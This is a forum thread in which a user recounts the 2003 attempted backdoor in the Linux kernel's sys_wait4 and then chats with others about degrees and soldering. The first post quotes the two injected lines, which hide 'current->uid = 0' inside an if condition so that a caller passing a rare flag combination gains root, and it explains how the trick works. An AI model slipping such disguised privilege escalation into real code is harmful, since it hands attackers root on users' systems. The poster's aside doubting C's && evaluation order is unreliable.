Hacks to be honest

[Steve]

I love a good hacker story; real ones that is.

I recently came across a story of an attempt to inject code into the Linux kernel that would give any local user root access on demand. I probably came across the news at the time of the discovery, but was then too uneducated to understand it.

Still, now I find it's a very interesting story and highlights just how easy it is to mislead people.

Back in Nov 2003 somebody noticed somebody had directly modified a CVS tree used in Linux development. At first it seemed like a silly user, or somebody who wasn't doing things properly.

However, follow the aforelinked mailing list replies and you'll see what was changed by the direct modification:

Code:

+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;

The code appeared in the file exit.c within the sys_wait4 function, part of the scheduling/queuing system in Linux.

The second line of code is pointless, but the one before it is potentially very problematic. The first half of the if statement checks for two flags. With the gcc compiler, this half of the if will be evaluated first (I do believe it's not a strict rule in C, however, and some compilers may do it differently?). If it's true, then the second half (after the &&) will be evaluated too.

First up, the two flags would never logically be set simultaneously (so I've read in the mailing list and other articles on this matter), but somebody could make them so, thus making the second half of the if statement evaluate.

The only problem is the second half of the statement isn't an evaluation, it's an assignment. "current->uid = 0" doesn't check the user id, it sets it. Bang, bit of root access for you, right there. == and =, there's a big difference.

Luckily the direct modification was noticed, and the intent of the injected code very quickly discovered, but had the edit been noticed, how long would it have been before it was found?

Hopefully some of you find stuff like this interesting too. Half of my degree is Computer Science, so I find it interesting by default I guess. Still, thought it was worth sharing

[kidzer]

I don't really understand a word of it, but its an interesting read

You say half your degree is Comp Sci, whats the other half?

[Steve]

Electronics Engineering.

I do Computer Systems Engineering, which is basically a mix of the two.

[g8ina]

But do you know which end of a soldering iron gets hot ?

I had a degree engineer working for me in Saudi in 1980, and the daft budder burned himself cuz he didnt know !!!

Honestly !!!

[Steve]

I can just about remember, although I haven't warmed one up for over a year now... gotta love breadboard!

That said, my solder skills are OK... not great, but a lot better than some I've seen.

[kidzer]

Oooh, solder...not one of my strong points, I dont like Lead-free solder, although I did get better over my first semester.

Made a PSU and I fixed my floppy drive, thats all the soldering i've done except for a wee radio about 4 years ago!

Computer Systems Engineering, sounds rather cool

[g8ina]

I soldered my first joint (in a crystal set) at age 8, in 1963/4

I have electrons in my veins and arteries, not blood !